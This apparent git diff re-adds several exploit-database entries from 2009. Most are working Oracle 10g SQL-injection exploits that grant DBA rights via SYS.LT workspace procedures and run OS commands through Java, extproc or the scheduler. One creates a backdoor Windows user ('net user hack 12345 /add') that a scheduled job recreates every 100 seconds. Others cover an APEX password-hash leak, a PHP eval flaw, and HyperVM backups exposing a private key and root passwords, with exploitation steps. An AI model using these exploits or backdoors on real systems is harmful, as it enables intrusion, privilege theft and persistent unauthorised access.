CHAR) +IS EXTERNAL +NAME "system" +LIBRARY extproc_shell +LANGUAGE C; +/ + +/* here we can paste any OS command for example create new user */ + +EXEC extprocexec('net user hack 12345 /add'); +/ + +select * from user_role_privs; + +// milw0rm.com [2009-01-06] diff --git a/platforms/multiple/local/7676.txt b/platforms/multiple/local/7676.txt index fc7673f73..ce00d369e 100755 --- a/platforms/multiple/local/7676.txt +++ b/platforms/multiple/local/7676.txt @@ -1,70 +1,70 @@ -/*********************************************************/ -/*Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit**/ -/****grant DBA and create new OS user (java)*************/ -/*********************************************************/ -/***********exploit grant DBA to scott********************/ -/***********and execute OS command "net user"*************/ -/***********using java procedures ************************/ -/*********************************************************/ -/***********tested on oracle 10.1.0.5.0*******************/ -/*********************************************************/ -/*********************************************************/ -/* Date of Public EXPLOIT: January 6, 2009 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsecrg.ru */ -/* http://www.dsec.ru */ -/*********************************************************/ -/*Original Advisory: */ -/*Esteban Martinez Fayo [Team SHATTER ] */ -/*Date of Public Advisory: November 11, 2008 */ -/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ -/*********************************************************/ - -select * from user_role_privs; - -CREATE OR REPLACE FUNCTION Y return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; -COMMIT; -RETURN 'Y'; -END; -/ - -exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); -exec SYS.LT.MERGEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); - - - -/* Creating simple java procedure that executes OS */ - -exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<>','execute'); -exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); -exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); - -CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS -import java.lang.*; -import java.io.*; -public class JAVACMD -{ - public static void execCommand (String command) throws IOException - { - Runtime.getRuntime().exec(command); - } -}; -/ - -CREATE OR REPLACE PROCEDURE JAVAEXEC (p_command IN VARCHAR2) -AS LANGUAGE JAVA -NAME 'JAVACMD.execCommand (java.lang.String)'; -/ - -/* here we can paste any OS command for example create new user */ - -exec javaexec(‘net user hack 12345 /add’); - -select * from user_role_privs; - -// milw0rm.com [2009-01-06] +/*********************************************************/ +/*Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit**/ +/****grant DBA and create new OS user (java)*************/ +/*********************************************************/ +/***********exploit grant DBA to scott********************/ +/***********and execute OS command "net user"*************/ +/***********using java procedures ************************/ +/*********************************************************/ +/***********tested on oracle 10.1.0.5.0*******************/ +/*********************************************************/ +/*********************************************************/ +/* Date of Public EXPLOIT: January 6, 2009 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsecrg.ru */ +/* http://www.dsec.ru */ +/*********************************************************/ +/*Original Advisory: */ +/*Esteban Martinez Fayo [Team SHATTER ] */ +/*Date of Public Advisory: November 11, 2008 */ +/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ +/*********************************************************/ + +select * from user_role_privs; + +CREATE OR REPLACE FUNCTION Y return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; +COMMIT; +RETURN 'Y'; +END; +/ + +exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); +exec SYS.LT.MERGEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); + + + +/* Creating simple java procedure that executes OS */ + +exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<>','execute'); +exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); +exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); + +CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS +import java.lang.*; +import java.io.*; +public class JAVACMD +{ + public static void execCommand (String command) throws IOException + { + Runtime.getRuntime().exec(command); + } +}; +/ + +CREATE OR REPLACE PROCEDURE JAVAEXEC (p_command IN VARCHAR2) +AS LANGUAGE JAVA +NAME 'JAVACMD.execCommand (java.lang.String)'; +/ + +/* here we can paste any OS command for example create new user */ + +exec javaexec(‘net user hack 12345 /add’); + +select * from user_role_privs; + +// milw0rm.com [2009-01-06] diff --git a/platforms/multiple/local/7677.txt b/platforms/multiple/local/7677.txt index dc0a0d605..e202373a4 100755 --- a/platforms/multiple/local/7677.txt +++ b/platforms/multiple/local/7677.txt @@ -1,132 +1,132 @@ -/*********************************************************/ -/*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/ -/**grant DBA and create new OS user (using scheduller)***/ -/*********************************************************/ -/***********exploit grant DBA to scott********************/ -/***********and execute OS command "net user"*************/ -/***********using scheduler*******************************/ -/*********************************************************/ -/***********tested on oracle 10.1.0.5.0*******************/ -/*********************************************************/ -/*********************************************************/ -/* Date of Public EXPLOIT: January 6, 2009 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsecrg.ru */ -/* http://www.dsec.ru */ -/*********************************************************/ -/*Original Advisory: */ -/*Esteban Martinez Fayo [Team SHATTER ] */ -/*Date of Public Advisory: November 11, 2008 */ -/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ -/*********************************************************/ - -select * from user_role_privs; - -CREATE OR REPLACE FUNCTION Z return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT'; -COMMIT; -RETURN 'Z'; -END; -/ - -exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z'); -exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z'); - - -/* We create backdored OS user "hack" with password 12345 using External Job's */ -/* Note that in this method new user will be created every 100 seconds */ -/* so if administrator find it and will try to delete it */ -/* user hack will be created again. So it is also a simle backdoor */ - -BEGIN - DBMS_SCHEDULER.CREATE_PROGRAM ( - program_name=> 'MyCmd', - program_type=> 'EXECUTABLE', - program_action =>’cmd /c "net user hack 12345 /add"’, - enabled=> TRUE); -END; -/ - -BEGIN -DBMS_SCHEDULER.CREATE_JOB ( - job_name=> 'extjobexec', - program_name=> 'MyCmd', - repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100', - enabled=> TRUE, - comments=> 'create backdoor user every 100 seconds'); -END; -/ - - -/* here we can paste any OS command for example create new user */ - -exec dbms_scheduler.run_job('extjobexec'); -/ - -select * from user_role_privs; - - - - - - - - - - - - - - - ---------------------------------------------------------------------------------- ------------------------------EXAMPLE OF EXPLOITATION ---------------------------- ---------------------------------------------------------------------------------- - - -SQL> select * from user_role_privs; - -USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------- ------------------------------ --- --- --- -OUTLN CONNECT NO YES NO -OUTLN RESOURCE NO YES NO - -SQL> CREATE OR REPLACE FUNCTION X return varchar2 - 2 authid current_user as - 3 pragma autonomous_transaction; - 4 BEGIN - 5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN'; - 6 COMMIT; - 7 RETURN 'x'; - 8 END; - 9 / - -Function created. - - - -SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x') - -PL/SQL procedure successfully completed. - -SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x') - -PL/SQL procedure successfully completed. - -SQL> select * from user_role_privs; - -USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------- ------------------------------ --- --- --- -OUTLN CONNECT NO YES NO -OUTLN DBA NO YES NO -OUTLN RESOURCE NO YES NO - -SQL> - -// milw0rm.com [2009-01-06] +/*********************************************************/ +/*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/ +/**grant DBA and create new OS user (using scheduller)***/ +/*********************************************************/ +/***********exploit grant DBA to scott********************/ +/***********and execute OS command "net user"*************/ +/***********using scheduler*******************************/ +/*********************************************************/ +/***********tested on oracle 10.1.0.5.0*******************/ +/*********************************************************/ +/*********************************************************/ +/* Date of Public EXPLOIT: January 6, 2009 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsecrg.ru */ +/* http://www.dsec.ru */ +/*********************************************************/ +/*Original Advisory: */ +/*Esteban Martinez Fayo [Team SHATTER ] */ +/*Date of Public Advisory: November 11, 2008 */ +/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ +/*********************************************************/ + +select * from user_role_privs; + +CREATE OR REPLACE FUNCTION Z return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT'; +COMMIT; +RETURN 'Z'; +END; +/ + +exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z'); +exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z'); + + +/* We create backdored OS user "hack" with password 12345 using External Job's */ +/* Note that in this method new user will be created every 100 seconds */ +/* so if administrator find it and will try to delete it */ +/* user hack will be created again. So it is also a simle backdoor */ + +BEGIN + DBMS_SCHEDULER.CREATE_PROGRAM ( + program_name=> 'MyCmd', + program_type=> 'EXECUTABLE', + program_action =>’cmd /c "net user hack 12345 /add"’, + enabled=> TRUE); +END; +/ + +BEGIN +DBMS_SCHEDULER.CREATE_JOB ( + job_name=> 'extjobexec', + program_name=> 'MyCmd', + repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100', + enabled=> TRUE, + comments=> 'create backdoor user every 100 seconds'); +END; +/ + + +/* here we can paste any OS command for example create new user */ + +exec dbms_scheduler.run_job('extjobexec'); +/ + +select * from user_role_privs; + + + + + + + + + + + + + + + +--------------------------------------------------------------------------------- +-----------------------------EXAMPLE OF EXPLOITATION ---------------------------- +--------------------------------------------------------------------------------- + + +SQL> select * from user_role_privs; + +USERNAME GRANTED_ROLE ADM DEF OS_ +------------------------------ ------------------------------ --- --- --- +OUTLN CONNECT NO YES NO +OUTLN RESOURCE NO YES NO + +SQL> CREATE OR REPLACE FUNCTION X return varchar2 + 2 authid current_user as + 3 pragma autonomous_transaction; + 4 BEGIN + 5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN'; + 6 COMMIT; + 7 RETURN 'x'; + 8 END; + 9 / + +Function created. + + + +SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x') + +PL/SQL procedure successfully completed. + +SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x') + +PL/SQL procedure successfully completed. + +SQL> select * from user_role_privs; + +USERNAME GRANTED_ROLE ADM DEF OS_ +------------------------------ ------------------------------ --- --- --- +OUTLN CONNECT NO YES NO +OUTLN DBA NO YES NO +OUTLN RESOURCE NO YES NO + +SQL> + +// milw0rm.com [2009-01-06] diff --git a/platforms/multiple/local/8456.txt b/platforms/multiple/local/8456.txt index 8a58dbb20..4961cb841 100755 --- a/platforms/multiple/local/8456.txt +++ b/platforms/multiple/local/8456.txt @@ -1,76 +1,76 @@ -Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] - -Name Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] -Systems Affected APEX 3.0 (optional component of 11.1.0.7 installation) -Severity High Risk -Category Password Disclosure -Vendor URL http://www.oracle.com/ -Author Alexander Kornbrust (ak at red-database-security.com) -CVE CVE-2009-0981 -Advisory 14 April 2009 (V 1.00) - - -Details -Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER. -Tested on 11.1.0.7. - -C:\> sqlplus dummy/dummy -Connected to: -Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production -With the Partitioning, OLAP, Data Mining and Real Application Testing options - -SQL> select granted_role from user_role_privs; - -GRANTED_ROLE ------------------------------- -CONNECT - - -SQL> select owner,table_name from all_tables where owner='FLOWS_030000'; - -OWNER TABLE_NAME ------------------------------- ------------------------------ -FLOWS_030000 WWV_FLOW_DUAL100 -FLOWS_030000 WWV_FLOW_LOV_TEMP -FLOWS_030000 WWV_FLOW_TEMP_TABLE - - - -Get a list of all columns containing the string "%PASSWORD%' - -SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%'; - -OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME --------------------------------------------------------------------------------- -FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE -FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED -FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW -FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2 -FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD -FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS -FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES -FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT -FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE - -9 rows selected. - - -SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS - -USER_NAME WEB_PASSWORD2 --------------------------------------------------------------------------------- -YURI 141FA790354FB6C72802FDEA86353F31 - -This password hash can be checked using a tool like Repscan. - - -Patch Information -Apply the patches for Oracle CPU April 2009. - - -History -13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] -14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] -14-apr-2009 Advisory published - -# milw0rm.com [2009-04-16] +Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] + +Name Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] +Systems Affected APEX 3.0 (optional component of 11.1.0.7 installation) +Severity High Risk +Category Password Disclosure +Vendor URL http://www.oracle.com/ +Author Alexander Kornbrust (ak at red-database-security.com) +CVE CVE-2009-0981 +Advisory 14 April 2009 (V 1.00) + + +Details +Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER. +Tested on 11.1.0.7. + +C:\> sqlplus dummy/dummy +Connected to: +Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production +With the Partitioning, OLAP, Data Mining and Real Application Testing options + +SQL> select granted_role from user_role_privs; + +GRANTED_ROLE +------------------------------ +CONNECT + + +SQL> select owner,table_name from all_tables where owner='FLOWS_030000'; + +OWNER TABLE_NAME +------------------------------ ------------------------------ +FLOWS_030000 WWV_FLOW_DUAL100 +FLOWS_030000 WWV_FLOW_LOV_TEMP +FLOWS_030000 WWV_FLOW_TEMP_TABLE + + + +Get a list of all columns containing the string "%PASSWORD%' + +SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%'; + +OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME +-------------------------------------------------------------------------------- +FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE +FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED +FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW +FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2 +FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD +FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS +FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES +FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT +FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE + +9 rows selected. + + +SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS + +USER_NAME WEB_PASSWORD2 +-------------------------------------------------------------------------------- +YURI 141FA790354FB6C72802FDEA86353F31 + +This password hash can be checked using a tool like Repscan. + + +Patch Information +Apply the patches for Oracle CPU April 2009. + + +History +13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] +14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] +14-apr-2009 Advisory published + +# milw0rm.com [2009-04-16] diff --git a/platforms/multiple/local/8641.txt b/platforms/multiple/local/8641.txt index 67d4f6c0e..64a967cd8 100755 --- a/platforms/multiple/local/8641.txt +++ b/platforms/multiple/local/8641.txt @@ -1,55 +1,55 @@ -mb_ereg(i)_replace() evaluate replacement string vulnerability - -by ryat#www.80vul.com - -when option parameter set e, matchs not be escaped. - -ex: - - - -phpinfo() will be evaluated. - -mb_ereg_replace() - - if ((replace_len - i) >= 2 && fwd == 1 && - p[0] == '\\' && p[1] >= '0' && p[1] <= '9') { - n = p[1] - '0'; - } - if (n >= 0 && n < regs->num_regs) { - if (regs->beg[n] >= 0 && regs->beg[n] < regs->end[n] && regs->end[n] <= string_len) { - smart_str_appendl(pbuf, string + regs->beg[n], regs->end[n] - regs->beg[n]); -// matchs not be escaped - } - -preg_replace() - - if ('\\' == *walk || '$' == *walk) { - smart_str_appendl(&code, segment, walk - segment); - if (walk_last == '\\') { - code.c[code.len-1] = *walk++; - segment = walk; - walk_last = 0; - continue; - } - segment = walk; - if (preg_get_backref(&walk, &backref)) { - if (backref < count) { - /* Find the corresponding string match and substitute it - in instead of the backref */ - match = subject + offsets[backref<<1]; - match_len = offsets[(backref<<1)+1] - offsets[backref<<1]; - if (match_len) { - esc_match = php_addslashes_ex(match, match_len, &esc_match_len, 0, 1 TSRMLS_CC); -// matchs escaped by addslashes() -... - smart_str_appendl(&code, esc_match, esc_match_len); - -# milw0rm.com [2009-05-07] +mb_ereg(i)_replace() evaluate replacement string vulnerability + +by ryat#www.80vul.com + +when option parameter set e, matchs not be escaped. + +ex: + + + +phpinfo() will be evaluated. + +mb_ereg_replace() + + if ((replace_len - i) >= 2 && fwd == 1 && + p[0] == '\\' && p[1] >= '0' && p[1] <= '9') { + n = p[1] - '0'; + } + if (n >= 0 && n < regs->num_regs) { + if (regs->beg[n] >= 0 && regs->beg[n] < regs->end[n] && regs->end[n] <= string_len) { + smart_str_appendl(pbuf, string + regs->beg[n], regs->end[n] - regs->beg[n]); +// matchs not be escaped + } + +preg_replace() + + if ('\\' == *walk || '$' == *walk) { + smart_str_appendl(&code, segment, walk - segment); + if (walk_last == '\\') { + code.c[code.len-1] = *walk++; + segment = walk; + walk_last = 0; + continue; + } + segment = walk; + if (preg_get_backref(&walk, &backref)) { + if (backref < count) { + /* Find the corresponding string match and substitute it + in instead of the backref */ + match = subject + offsets[backref<<1]; + match_len = offsets[(backref<<1)+1] - offsets[backref<<1]; + if (match_len) { + esc_match = php_addslashes_ex(match, match_len, &esc_match_len, 0, 1 TSRMLS_CC); +// matchs escaped by addslashes() +... + smart_str_appendl(&code, esc_match, esc_match_len); + +# milw0rm.com [2009-05-07] diff --git a/platforms/multiple/local/9072.txt b/platforms/multiple/local/9072.txt index 44e499ab8..6c7ea2511 100755 --- a/platforms/multiple/local/9072.txt +++ b/platforms/multiple/local/9072.txt @@ -1,56 +1,56 @@ -This is slightly modified version of: http://milw0rm.com/exploits/7677 -This is based on cursor injection and does not need create function privileges: - -DECLARE -D NUMBER; -BEGIN -D := DBMS_SQL.OPEN_CURSOR; -DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0); -SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); -SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); -end; - -#-----------screen dump---------------------------------------------------# -SQL> select * from user_role_privs; - -USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------- ------------------------------ --- --- --- -SCOTT CONNECT NO YES NO -SCOTT EXECUTE_CATALOG_ROLE NO YES NO -SCOTT RESOURCE NO YES NO - -SQL> DECLARE - 2 D NUMBER; - 3 BEGIN - 4 D := DBMS_SQL.OPEN_CURSOR; - 5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme -diate ''grant dba to scott'';commit;end;',0); - 6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); - 7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); - 8 end; - 9 - 10 - 11 / -DECLARE -* -ERROR at line 1: -ORA-01403: no data found -ORA-06512: at "SYS.LT", line 6118 -ORA-06512: at "SYS.LT", line 6087 -ORA-06512: at line 7 - - -SQL> select * from user_role_privs; - -USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------- ------------------------------ --- --- --- -SCOTT CONNECT NO YES NO -SCOTT DBA NO YES NO -SCOTT EXECUTE_CATALOG_ROLE NO YES NO -SCOTT RESOURCE NO YES NO - - -Sid -www.notsosecure.com - -# milw0rm.com [2009-07-02] +This is slightly modified version of: http://milw0rm.com/exploits/7677 +This is based on cursor injection and does not need create function privileges: + +DECLARE +D NUMBER; +BEGIN +D := DBMS_SQL.OPEN_CURSOR; +DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0); +SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); +SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); +end; + +#-----------screen dump---------------------------------------------------# +SQL> select * from user_role_privs; + +USERNAME GRANTED_ROLE ADM DEF OS_ +------------------------------ ------------------------------ --- --- --- +SCOTT CONNECT NO YES NO +SCOTT EXECUTE_CATALOG_ROLE NO YES NO +SCOTT RESOURCE NO YES NO + +SQL> DECLARE + 2 D NUMBER; + 3 BEGIN + 4 D := DBMS_SQL.OPEN_CURSOR; + 5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme +diate ''grant dba to scott'';commit;end;',0); + 6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); + 7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); + 8 end; + 9 + 10 + 11 / +DECLARE +* +ERROR at line 1: +ORA-01403: no data found +ORA-06512: at "SYS.LT", line 6118 +ORA-06512: at "SYS.LT", line 6087 +ORA-06512: at line 7 + + +SQL> select * from user_role_privs; + +USERNAME GRANTED_ROLE ADM DEF OS_ +------------------------------ ------------------------------ --- --- --- +SCOTT CONNECT NO YES NO +SCOTT DBA NO YES NO +SCOTT EXECUTE_CATALOG_ROLE NO YES NO +SCOTT RESOURCE NO YES NO + + +Sid +www.notsosecure.com + +# milw0rm.com [2009-07-02] diff --git a/platforms/multiple/local/9520.txt b/platforms/multiple/local/9520.txt index ef975b941..8bc791481 100755 --- a/platforms/multiple/local/9520.txt +++ b/platforms/multiple/local/9520.txt @@ -1,93 +1,93 @@ -HyperVM is a virtualization application that runs off a host node and can provide -several Virtual Private Servers. There is a previously unreported vulnerability in -HyperVM/Kloxo. - -It was originally documented in ISSUE 14 by an anonymous author: -http://www.milw0rm.com/exploits/8880 - -It turns out that he was showing how a root shell can be created: - - [user1@testing574 tmp]$ ls -al - total 28 - drwxrwxrwt 4 root root 4096 May 21 08:41 . - drwxr-xr-x 24 root root 4096 May 19 16:57 .. - -rw-rw-r-- 1 user1 user1 0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell; - drwx------ 2 root root 4096 May 21 08:41 backupPdUzR4 - -rwsr-xr-x 1 root root 5056 May 21 08:41 shell - -rw-rw-r-- 1 user1 user1 89 May 21 08:33 shell.c - -This is pointless, because after a 'restore from backup' in HyperVM, it creates that folder -"backupPdUzR4" - -Let's take a look at it...On a VM I tested, even the directory was readable. -$ ls -lha /tmp/backupfileIy00MO/ -total 36K -drwxr-xr-x 2 root root 4.0K Dec 12 02:18 . -drwxr-xr-x 3 root root 4.0K Dec 12 10:37 .. --rw-r--r-- 1 root root 15K Dec 12 00:46 hypervm.file --rw-r--r-- 1 root root 11K Dec 12 00:46 hypervm.metadata - -World readable files. In it, root passwords in plain text. Including username, RSA private keys and lots more. - -Here the VM type is shown, it appears to be OpenVZ: -$ cat hypervm.file -al_list";a:0:{}s:13:"__object_list";N;s:9:"subaction";N;s:8:"dbaction";s:5:"clean";s:12:"metadbaction";s:3:"all";s:7:"__class";s:11:"vps__op -envz"; - ---snip-- -Private keys! -"hostname";s:8:"fakevps";s:12:"use -rname";s:10:"fakeusername";s:16:"text_private_key";s:887:"-----BEGIN RSA PRIVATE KEY----- -FIICXZIBAAKBgQDdehG9ScmFWL3AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9 -dJ/gI+NoY1ygic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQC -Lf17blSAQAXPi84Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY8QpSewoVQIDAQAB -AoGBAKVT7E4a+L38AmoHlWa4KGfCx5hqHC0ZODzQkGG+3HUn0hjyrUlzd6z/3VAd -bBXDCUYf82XMY3h0bOElKPwvHw3+sgUyceSBONLa9pi+He/6ljwR0/LG6XjctdLH -RwVNTEXY/JS15VRKyyXMdohhVbIXa3NjbMqvIBEJPmnjVlWBAkEA90xPi9te3HYj -54uH7/+cEuZ9TlLyeB9+MQ0t7MfqNY1v2PRK+h4J6y4N+v43o9kkN7RGR3zd5Bww -qP/TEfBL8QJBAOVFKGMwkY/2dhqKjnHC2rkN8B5Hn8Px2quf7SXn2tgnuZRYOxah -WAtzdZSt64Vsaz+3fh6tIZ6YYQo/BYJMlqUCQD/UpIWPmZrCqJgVLn/n9kvu0xSh -V1ZpkvNo2p1RMwamP+S7lIujq53aYuOUM5sKGM6ErMwR0VrtaCaI/N2ZspECQBZn -P58Rq+epabkGOQ0cwUq79e6/iPkYtQl4QzAlC9kRF61LQdrgQT49NgwlQpJzGbfM -TmLFADgDI9hgeCVXXpECQQC0c5owQrCx38xtZp6dydAccnHo4jrC83lRL6Epxueo -i+3UYzuVxCQkBdhoF/5nsXv5Qh914MHGnH12qepPokyjd ------END RSA PRIVATE KEY----- -";s:15:"text_public_key";s:1188:"-----BEGIN CERTIFICATE----- -BIIDfPzCCAqigAwIBAgIBADANBgkqhkiG9w0BAQUFADB5MRMwEQYDNQDEwpseGxh -YnMuY29tMQswCQYDVQQGEwJJTjELMAkGA1UECBMCaW4xCzAJBgNVBAcTAmluMQsw -CQYDVQQKEwJseDENMAsGA1UECxMEc29mdDEfMB0GCSqGSIb3DQEJAUYQYWRtaW5A -bHhsYWJzLmNvbTAeFw0wOTA2MTExMzAyNDdaFw0xMDA2MTExMzAyNDdaMHkxEzAR -BgNVBAMTCmx4bGFicy9jb20xCzAJBgNVBAYTAklOMQswCQYDVQQIEwJpbjELMAkG -Z2UEBxMCaW4xCzAJBgNVBAoTAmx4MQ0wCwYDVQQLEwRzb3Z0MR8wHQYJKoZIhvcN -AQkBFhBhZG1pbkBseGxhYnMuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB -gQDdehG9ScmFWL2AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9dJ/gI+NoY1yg -ic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQCLf17blSAQAXP -i94Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY7QpSewoVQIDAQABo4KWMIHTMB0G -A1UdDgQWBBRMXffyd+fJWt/iYe1jteuLL8UukzCBowYDVR0jBIGbMIGYgBRMXffy -d+fJWt/iYe1jteuLL8Uuk6F9pHsweTETMBEGA1UEAxMKbHhsYWJzLmNvbTELMAkG -A1UEBhMCSU4xCzAJBgNVBAgTAmluMQswCQYDVQQHEwJpbjELMAkGA1UEChMCbHgx -DTALBgNVBAsTBHNvZnQxHzAdBgkqhkiG9w0BCQEWEGFkbWluQGx4bGIicy5jb22C -AQAwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQCQnz/9DIzn5CVItRwk -HHMZBLlq3MtmQYmwGuNjiss3UkYC1ehi9LDLfQ4AzJfjUrvBpuksozdfvYlpXnA1 -LAmOniBgyZW0aUStSrSr4czva4d3VMyOqQ/Dgr//i+RSuo4QH+6wI0G/oirE+E6b -uR24why0WWPNsyJU3adesPo4eQf== ------END CERTIFICATE----- - ---snip-- -Root passwords! -sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"xxxxxxxxxxxxxxxxxxxx";s:20:"rootpassword_changed";s - -So in summary, here are the exploitation steps: -1. Log into HyperVM/Kloxo -2. Click "Backup Home" -3. In the field labeled "Restore from file", browse for any restore file from the popup box. -4. Wait till the VM has finished restoring from backup. -5. Login. If the root user hasn't deleted these files from /tmp/backupXXXXX before bringing up the network 